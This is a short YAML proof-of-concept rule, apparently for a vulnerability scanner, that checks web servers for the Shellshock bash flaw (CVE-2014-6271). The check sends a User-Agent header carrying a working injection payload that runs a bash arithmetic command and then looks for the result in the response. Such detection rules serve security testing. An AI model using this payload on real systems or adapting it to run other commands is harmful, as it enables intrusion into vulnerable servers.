name: poc-yaml-bash-cve-2014-6271
set:
  r1: randomInt(800000000, 1000000000)
  r2: randomInt(800000000, 1000000000)
rules:
  - method: GET
    headers:
      User-Agent: "() { :; }; echo; echo; /bin/bash -c 'expr {{r1}} + {{r2}}'"
    follow_redirects: false
    expression: response.body.bcontains(bytes(string(r1 + r2)))
detail:
  author: neal1991(https://github.com/neal1991)
  links:
    - https://github.com/opsxcq/exploit-CVE-2014-6271